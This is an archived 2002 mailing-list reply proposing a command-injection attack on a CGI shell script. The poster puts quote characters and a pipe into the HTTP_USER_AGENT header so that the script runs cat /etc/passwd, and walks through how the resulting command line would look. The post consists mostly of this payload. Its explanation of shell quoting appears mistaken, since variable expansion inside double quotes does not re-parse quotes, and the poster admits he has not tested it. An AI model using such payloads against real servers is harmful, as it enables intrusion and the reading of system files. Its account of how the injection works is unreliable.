Have you considered including qoute characters in the HTTP_USER_AGENT field? like so: $HTTP_USER_AGENT = "" | cat "/etc/passwd" if you do this, the ua=`echo "$HTTP_USER_AGENT" | sed "s#\;##g"` stirng will come out looking like the following: ua=`echo "" | cat "/etc/passwd" | sed "s#\;##g"` all you are doing is terminating the echo text with a qoute character, and then adding another qoute character before the filename so that the command will be interpreted correctly... Let me know if this works, but it should...
Nick Jacobsen Ethics Design nick@ethicsdesign.com
> On Thu, 14 Nov 2002, c jones wrote: Received on Sun Nov 17 01:39:27 2002
This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:37 EDT